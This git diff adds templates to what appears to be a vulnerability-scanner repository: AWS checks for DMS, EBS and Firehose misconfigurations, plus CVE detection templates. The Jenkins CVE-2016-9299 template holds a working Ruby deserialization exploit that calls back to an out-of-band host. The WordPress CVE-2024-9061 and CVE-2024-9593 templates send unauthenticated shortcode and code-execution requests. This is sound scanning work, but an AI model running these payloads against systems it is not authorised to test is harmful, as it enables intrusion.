diff --git a/.new-additions b/.new-additions index f4d205db1e..4d7f25942d 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,9 @@ +cloud/aws/dms/dms-multi-az.yaml +cloud/aws/dms/dms-public-access.yaml +cloud/aws/dms/dms-version-upgrade.yaml +cloud/aws/ebs/ebs-encryption-disabled.yaml +cloud/aws/firehose/firehose-server-destination-encryption.yaml +cloud/aws/firehose/firehose-server-side-encryption.yaml dast/cves/2024/CVE-2024-2961.yaml http/cnvd/2024/CNVD-2024-38747.yaml http/cves/2015/CVE-2015-8562.yaml @@ -25,6 +31,7 @@ http/cves/2023/CVE-2023-40931.yaml http/cves/2023/CVE-2023-43373.yaml http/cves/2023/CVE-2023-5558.yaml http/cves/2023/CVE-2023-5561.yaml +http/cves/2024/CVE-2016-9299.yaml http/cves/2024/CVE-2024-22476.yaml http/cves/2024/CVE-2024-32735.yaml http/cves/2024/CVE-2024-32736.yaml @@ -43,17 +50,22 @@ http/cves/2024/CVE-2024-48914.yaml http/cves/2024/CVE-2024-49757.yaml http/cves/2024/CVE-2024-5910.yaml http/cves/2024/CVE-2024-8698.yaml +http/cves/2024/CVE-2024-9061.yaml http/cves/2024/CVE-2024-9234.yaml +http/cves/2024/CVE-2024-9593.yaml http/cves/2024/CVE-2024-9617.yaml +http/cves/2024/CVE-2024-9796.yaml http/default-logins/apache/doris-default-login.yaml http/default-logins/sato/sato-default-login.yaml http/default-logins/zebra/zebra-printer-default-login.yaml +http/exposed-panels/1password-scim-panel.yaml http/exposed-panels/danswer-panel.yaml http/exposed-panels/freescout-panel.yaml http/exposed-panels/nagios/nagios-logserver-panel.yaml http/exposed-panels/olympic-panel.yaml http/exposed-panels/onedev-panel.yaml http/exposed-panels/paloalto-expedition-panel.yaml +http/exposed-panels/reolink-panel.yaml http/exposed-panels/sqlpad-panel.yaml http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml @@ -72,6 +84,7 @@ http/technologies/mirth-connect-detect.yaml http/technologies/oracle-fusion-detect.yaml http/technologies/salesforce-b2c-commerce-webdav.yaml http/technologies/wordpress/plugins/burst-statistics.yaml +http/vulnerabilities/hcm/hcm-cloud-lfi.yaml http/vulnerabilities/nagios/nagios-xi-xss.yaml http/vulnerabilities/wordpress/application-pass-xss.yaml http/vulnerabilities/wordpress/wp-footnote-xss.yaml diff --git a/cloud/aws/dms/dms-multi-az.yaml b/cloud/aws/dms/dms-multi-az.yaml new file mode 100644 index 0000000000..00b17552b0 --- /dev/null +++ b/cloud/aws/dms/dms-multi-az.yaml @@ -0,0 +1,59 @@ +id: dms-multi-az + +info: + name: DMS Multi-AZ Not Enabled + author: DhiyaneshDK + severity: medium + description: | + Ensure that your Amazon Database Migration Service (DMS) replication instances are using Multi-AZ deployment configurations to provide High Availability (HA) through automatic failover to standby replicas in the event of a failure such as an Availability Zone (AZ) outage, an internal hardware or network outage, a software failure or in case of a planned maintenance session + impact: | + Not enabling Multi-AZ for Database Migration Service can lead to increased downtime and data loss risks during outages, compromising the availability and reliability of your database operations. + remediation: | + Enable Multi-AZ support for your Database Migration Service to enhance availability and resilience, ensuring automatic failover and reducing downtime during outages. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/multi-az.html + - https://docs.aws.amazon.com/cli/latest/reference/dms/describe-replication-instances.html + tags: cloud,devops,aws,amazon,dms,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let ReplicationInstances of iterate(template.replications)){ + set("replication", ReplicationInstances) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: | + aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json + + extractors: + - type: json + name: replications + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].MultiAZ" --output json + + matchers: + - type: word + words: + - "false" + + extractors: + - type: dsl + dsl: + - '"DMS Multi-AZ " + replication + " is not enabled"' +# digest: 4a0a004730450220052c0de2e02b60b42a79e7d02c2e38f90423664ca041b2dddd276b0f0b55d3fa022100a434388c051cee8dfa5e4d962699aa4abdc66971013a62f1cc3c85a9c434519b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/dms/dms-public-access.yaml b/cloud/aws/dms/dms-public-access.yaml new file mode 100644 index 0000000000..59a637ebed --- /dev/null +++ b/cloud/aws/dms/dms-public-access.yaml @@ -0,0 +1,59 @@ +id: dms-public-access + +info: + name: Publicly Accessible DMS Replication Instances + author: DhiyaneshDK + severity: medium + description: | + Ensure that your Amazon Database Migration Service (DMS) are not publicly accessible from the Internet in order to avoid exposing private data and minimize security risks. + impact: | + Publicly accessible DMS replication instances expose your database to unauthorized access and potential attacks, increasing the risk of data breaches and compromising the security of sensitive information. + remediation: | + Restrict access to your DMS replication instances by configuring security groups and network access controls to allow connections only from trusted IP addresses and private subnets, ensuring that they are not publicly accessible. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/publicly-accessible.html + - https://docs.aws.amazon.com/dms/latest/userguide/CHAP_ReplicationInstance.html + tags: cloud,devops,aws,amazon,dms,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let ReplicationInstances of iterate(template.replications)){ + set("replication", ReplicationInstances) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: | + aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json + + extractors: + - type: json + name: replications + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].PubliclyAccessible" --output json + + matchers: + - type: word + words: + - "true" + + extractors: + - type: dsl + dsl: + - '"DMS Replication Instances " + replication + " Publicly Accessible"' +# digest: 4b0a00483046022100c2e4b02073095257867ae2f880894485ce4395d427a0f5797433d453d16557b4022100f11bea387537d175614dcbe4c0e1f7a3d19cfe18b2eb5177157de179677aaea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/dms/dms-version-upgrade.yaml b/cloud/aws/dms/dms-version-upgrade.yaml new file mode 100644 index 0000000000..3408fff682 --- /dev/null +++ b/cloud/aws/dms/dms-version-upgrade.yaml @@ -0,0 +1,59 @@ +id: dms-version-upgrade + +info: + name: DMS Auto Minor Version Upgrade + author: DhiyaneshDK + severity: medium + description: | + Ensure that your Amazon Database Migration Service (DMS) replication instances have the Auto Minor Version Upgrade feature enabled in order to receive automatically minor engine upgrades. + impact: | + Not enabling DMS Auto Minor Version Upgrade can lead to running outdated database versions, increasing vulnerability to security risks and bugs, while missing out on performance improvements and new features provided in minor updates. + remediation: | + Enable DMS Auto Minor Version Upgrade to automatically apply minor version updates, ensuring your database is always up-to-date with the latest security patches, performance enhancements, and bug fixes. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/auto-minor-version-upgrade.html + - https://docs.aws.amazon.com/cli/latest/reference/dms/index.html + tags: cloud,devops,aws,amazon,dms,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let ReplicationInstances of iterate(template.replications)){ + set("replication", ReplicationInstances) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: | + aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json + + extractors: + - type: json + name: replications + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].AutoMinorVersionUpgrade" --output json + + matchers: + - type: word + words: + - "false" + + extractors: + - type: dsl + dsl: + - '"DMS Auto Minor Version Upgrade " + replication + " not enabled"' +# digest: 4b0a00483046022100e170aa216555156ddf46a196e60d6985d37d29f32146f0bfeaeef1ceba09e73c022100f95487bc9c2f2bfe9288a9362f868268f3bb7cd963b36c44be1b6629a06b3a6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ebs/ebs-encryption-disabled.yaml b/cloud/aws/ebs/ebs-encryption-disabled.yaml new file mode 100644 index 0000000000..fafa9de383 --- /dev/null +++ b/cloud/aws/ebs/ebs-encryption-disabled.yaml @@ -0,0 +1,61 @@ +id: ebs-encryption-disabled + +info: + name: EBS Encryption - Disabled + author: DhiyaneshDK + severity: high + description: | + Ensure that all your Amazon Elastic Block Store (EBS) volumes are encrypted in order to meet security and compliance requirements. With encryption enabled, your EBS volumes can hold sensitive, confidential, and critical data. + impact: | + Disabling AWS EBS encryption exposes sensitive data to unauthorized access, increasing the risk of data breaches and compliance violations. + remediation: | + Enable encryption for all existing EBS volumes and ensure that all new volumes created are configured to use encryption by default. Additionally, update any snapshots to be encrypted and use AWS Key Management Service (KMS) to manage encryption keys securely. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/EBS/ebs-encrypted.html + - http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html + tags: cloud,devops,aws,amazon,ebs,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let VolumesVolumeId of iterate(template.volumes)){ + set("volume", VolumesVolumeId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws ec2 describe-volumes --region $region --query 'Volumes[*].VolumeId' --output json + + extractors: + - type: json + name: volumes + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws ec2 describe-volumes --region $region --volume-ids $volume --query 'Volumes[*].Encrypted' --output text + + matchers: + - type: word + words: + - "False" + + extractors: + - type: dsl + dsl: + - '"EBS Encryption " + volumes + " is Disabled"' +# digest: 4a0a00473045022100fe98ba08fe06c9398f905a0651ac60c5cfbdbeaf2fa0c524aa9d2c0e29d3c75902200ab089e32558f42e2a7f8d5fafb3e309dfe261bad4e417532734222a7cbaa7cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/firehose/firehose-server-destination-encryption.yaml b/cloud/aws/firehose/firehose-server-destination-encryption.yaml new file mode 100644 index 0000000000..e81d019c7c --- /dev/null +++ b/cloud/aws/firehose/firehose-server-destination-encryption.yaml @@ -0,0 +1,59 @@ +id: firehose-server-destination-encryption + +info: + name: Firehose Delivery Stream Destination Encryption - Disabled + author: DhiyaneshDK + severity: medium + description: | + Ensure that your Kinesis Firehose delivery stream data records are encrypted at destination (i.e. Amazon S3) in order to meet regulatory requirements and protect your Firehose data at rest. + impact: | + Disabling encryption for Firehose delivery stream destinations can lead to sensitive data being stored unencrypted, increasing the risk of data exposure and unauthorized access. + remediation: | + Enable encryption for Firehose delivery stream destinations to ensure that all data is encrypted at rest, safeguarding sensitive information from unauthorized access and potential data breaches. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Firehose/delivery-stream-destination-encryption.html + - https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingKMSEncryption.html + tags: cloud,devops,aws,amazon,firehose,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DeliveryStreamNames of iterate(template.deliverys)){ + set("delivery", DeliveryStreamNames) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: | + aws firehose list-delivery-streams --region $region --query 'DeliveryStreamNames' --output json + + extractors: + - type: json + name: deliverys + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws firehose describe-delivery-stream --region $region --delivery-stream-name $delivery --query 'DeliveryStreamDescription.Destinations[*].ExtendedS3DestinationDescription.EncryptionConfiguration' --output json + + matchers: + - type: word + words: + - "NoEncryption" + + extractors: + - type: dsl + dsl: + - '"Firehose Delivery Stream Destination " + delivery + " Encryption is Disabled"' +# digest: 490a0046304402201742209d94926b372dbccead7a059d88a973ed2020c9a79e7015331a3e66b20002206a6c98cac36c76d372585674da6f65d3dd50ee0053363cb2f9ffeefa9bf88460:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/firehose/firehose-server-side-encryption.yaml b/cloud/aws/firehose/firehose-server-side-encryption.yaml new file mode 100644 index 0000000000..95e8228086 --- /dev/null +++ b/cloud/aws/firehose/firehose-server-side-encryption.yaml @@ -0,0 +1,59 @@ +id: firehose-server-side-encryption + +info: + name: Firehose Delivery Stream Server-Side Encryption - Disabled + author: DhiyaneshDK + severity: high + description: | + Ensure that your Amazon Kinesis Data Firehose delivery streams are encrypted using Server-Side Encryption. + impact: | + Disabling server-side encryption for Firehose delivery streams can result in unencrypted data being stored, exposing sensitive information to unauthorized access and increasing the risk of data breaches. + remediation: | + Enable server-side encryption for Firehose delivery streams to ensure that data is securely encrypted at rest, protecting sensitive information from unauthorized access. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Firehose/delivery-stream-encrypted-with-kms-customer-master-keys.html + - https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingKMSEncryption.html + tags: cloud,devops,aws,amazon,firehose,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DeliveryStreamNames of iterate(template.deliverys)){ + set("delivery", DeliveryStreamNames) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: | + aws firehose list-delivery-streams --region $region --query 'DeliveryStreamNames' --output json + + extractors: + - type: json + name: deliverys + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws firehose describe-delivery-stream --region $region --delivery-stream-name $delivery --query 'DeliveryStreamDescription.DeliveryStreamEncryptionConfiguration.KeyType' --output json + + matchers: + - type: word + words: + - "null" + + extractors: + - type: dsl + dsl: + - '"Firehose delivery stream " + delivery + " is not encrypted using SSE"' +# digest: 4a0a00473045022100c27f022ba1deaf796d3a13a7fff3ccc19f5c8ccafb2406a5632741e33645b130022018b443d8917635142e697c54efccbdd18fd4873b7cc9fdebac19537f0ddbcdf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cves.json b/cves.json index 7425386f60..ae97c5ef8e 100644 --- a/cves.json +++ b/cves.json @@ -2717,10 +2717,13 @@ {"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"} {"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"} {"ID":"CVE-2024-9014","Info":{"Name":"pgAdmin 4 - Authentication Bypass","Severity":"critical","Description":"pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9014.yaml"} +{"ID":"CVE-2024-9061","Info":{"Name":"WP Popup Builder Popup Forms and Marketing Lead Generation \u003c= 1.3.5 - Arbitrary Shortcode Execution","Severity":"high","Description":"The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-9061.yaml"} {"ID":"CVE-2024-9234","Info":{"Name":"GutenKit \u003c= 2.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The GutenKit Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-9234.yaml"} {"ID":"CVE-2024-9463","Info":{"Name":"PaloAlto Networks Expedition - Remote Code Execution","Severity":"critical","Description":"An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9463.yaml"} {"ID":"CVE-2024-9465","Info":{"Name":"Palo Alto Expedition - SQL Injection","Severity":"high","Description":"An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-9465.yaml"} +{"ID":"CVE-2024-9593","Info":{"Name":"Time Clock \u003c= 1.2.2 \u0026 Time Clock Pro \u003c= 1.1.4 - Remote Code Execution","Severity":"high","Description":"The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-9593.yaml"} {"ID":"CVE-2024-9617","Info":{"Name":"Danswer - Insecure Direct Object Reference","Severity":"medium","Description":"The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-9617.yaml"} +{"ID":"CVE-2024-9796","Info":{"Name":"WordPress WP-Advanced-Search \u003c= 3.3.9 - SQL Injection","Severity":"critical","Description":"The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-9796.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2004-2687","Info":{"Name":"Distccd v1 - Remote Code Execution","Severity":"high","Description":"distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"network/cves/2004/CVE-2004-2687.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index c7f6dba95a..67fcd15186 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -13888324a39d31ce90973d926d640532 +2d385a9a80b48d960e7e3c78bad06e09 diff --git a/http/cves/2024/CVE-2016-9299.yaml b/http/cves/2024/CVE-2016-9299.yaml new file mode 100644 index 0000000000..7acc80d0b1 --- /dev/null +++ b/http/cves/2024/CVE-2016-9299.yaml @@ -0,0 +1,123 @@ +id: CVE-2016-9299 + +info: + name: Jenkins CLI - HTTP Java Deserialization + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server. + reference: + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb + - https://nvd.nist.gov/vuln/detail/CVE-2016-9299 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-9299 + cwe-id: CWE-90 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* + metadata: + max-request: 1 + verified: true + vendor: jenkins + product: jenkins + shodan-query: product:"jenkins" + fofa-query: icon_hash=81586312 + tags: cve,cve2016,rce,deserialization + +variables: + oast: "{{interactsh-url}}" + +code: + - engine: + - rb + - ruby # requires ruby to be pre-installed on system running nuclei + + source: | + require 'socket' + require 'base64' + + # Define environment variables for host details (make sure they are properly set in your environment) + $Hostname = ENV['Hostname'] + $Host = ENV['Host'] + $Port = ENV['Port'] + interactsh = (ENV['oast']).ljust(45,'/') + url_dns = "aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74002d657761776a7763737778766b6a66737763716c69316673737632357271306438642e6f6173742e6f6e6c696e6574000071007e0005740004687474707078740034687474703a2f2f657761776a7763737778766b6a66737763716c69316673737632357271306438642e6f6173742e6f6e6c696e6578" + $decoded_url_dns = [url_dns].pack("H*") + $decoded_url_dns = $decoded_url_dns.gsub! "ewawjwcswxvkjfswcqli1fssv25rq0d8d.oast.online", interactsh + + # Step 1: Send the download request without waiting for a response or closing the socket + def send_download_request(host, port) + download_socket = TCPSocket.new(host, port) + + download_request = <<~REQ + POST /cli HTTP/1.1 + Host: #{$Hostname} + Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93 + Side: download + Content-Type: application/x-www-form-urlencoded + Content-Length: 0\r\n + REQ + + #puts "Sending Download Request..." + download_socket.write(download_request) + + # Return the open socket so we can read from it later + return download_socket + end + + # Step 2: Send the upload request + def send_upload_request(host, port) + socket = TCPSocket.new(host, port) + + # Base64 decoded payload for upload request + chunked_payload = "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\x01\x55" + $decoded_url_dns + + upload_request = <<~REQ + POST /cli HTTP/1.1 + Host: #{$Hostname} + Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93 + Side: upload + Content-Type: application/octet-stream + Content-Length: #{chunked_payload.bytesize}\r\n + REQ + + #puts "Sending Upload Request..." + socket.write(upload_request) + + # Send the binary data (payload) + socket.write(chunked_payload) + + # Read and print the response for the upload request + response = socket.readpartial(1024) + #puts "Received from server (upload response): #{response}" + + # Close the socket for upload request + socket.close + end + + # Step 3: After upload request, read the download request's response + def read_download_response(socket) + #puts "Reading Download Request Response..." + response = socket.readpartial(1024) + socket.close + response + + end + + # Combined steps to perform the operations in the required order + # Step 1: Send download request (don't wait for response, keep the socket open) + download_socket = send_download_request($Host, $Port) + + # Step 2: Send upload request + send_upload_request($Host, $Port) + + # Print the download response + puts read_download_response(download_socket) + + matchers: + - type: dsl + dsl: + - "contains(response,'hudson.remoting.UserRequest')" + - 'contains(interactsh_protocol, "dns")' + condition: and +# digest: 490a0046304402203cca921300c636eb8d986136c3b5dd567649cc0e956e016278f9e8e6d2e2f14602207e558f218d7293d1e2d1fa942bc313b240086e5f74545143c5553d3d044b4831:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-49757.yaml b/http/cves/2024/CVE-2024-49757.yaml index 115f2c1d85..0feb56dce6 100644 --- a/http/cves/2024/CVE-2024-49757.yaml +++ b/http/cves/2024/CVE-2024-49757.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207d49c3297e84b73e97ee50057e586be8609be53b012523511299887a50cad877022100b4437a3ff67854693adb66be76d5b30547c18a9596223a06685fa02932bbc805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b4f85fbe7f82396cb84d4980b7cab502297c575cda88ad470169b72b87f641cf022100b3da53c83ed560855d843013d6f9ea158f906252de2100fcb836ccf154283dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-9061.yaml b/http/cves/2024/CVE-2024-9061.yaml new file mode 100644 index 0000000000..8b007ec38d --- /dev/null +++ b/http/cves/2024/CVE-2024-9061.yaml @@ -0,0 +1,61 @@ +id: CVE-2024-9061 + +info: + name: WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution + author: s4e-io + severity: high + description: | + The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-9061 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve + - https://github.com/RandomRobbieBF/CVE-2024-9061 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-9061 + cwe-id: CWE-94 + epss-score: 0.00046 + epss-percentile: 0.18015 + metadata: + max-request: 2 + verified: true + vendor: themehunk + product: wp-popup-builder + framework: wordpress + fofa-query: body="/wp-content/plugins/wp-popup-builder/" + tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "/wp-content/plugins/wp-popup-builder")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31 + + matchers: + - type: dsl + dsl: + - 'len(body) == 13' + - 'contains(body, "CVE-2024-9061")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and +# digest: 4b0a00483046022100f80fec38e7c5f649695bac35530600b4fbfa1daa9782d746571908c193ec333d022100f9b434ac3748d54c493f2ad2d7bf045e53c97e1abd079858c054b0ce2f03e0e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-9593.yaml b/http/cves/2024/CVE-2024-9593.yaml new file mode 100644 index 0000000000..5d95f14137 --- /dev/null +++ b/http/cves/2024/CVE-2024-9593.yaml @@ -0,0 +1,72 @@ +id: CVE-2024-9593 + +info: + name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution + author: s4e-io + severity: high + description: | + The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution + - https://nvd.nist.gov/vuln/detail/CVE-2024-9593 + - https://github.com/RandomRobbieBF/CVE-2024-9593 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: CVE-2024-9593 + cwe-id: CWE-94 + epss-score: 0.00052 + epss-percentile: 0.21567 + metadata: + max-request: 2 + verified: true + vendor: scott_paterson + product: time-clock & time-clock-pro + framework: wordpress + fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/" + tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "/wp-content/plugins/time-clock")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + function=phpinfo + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "PHP Extension" + - "PHP Version" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' +# digest: 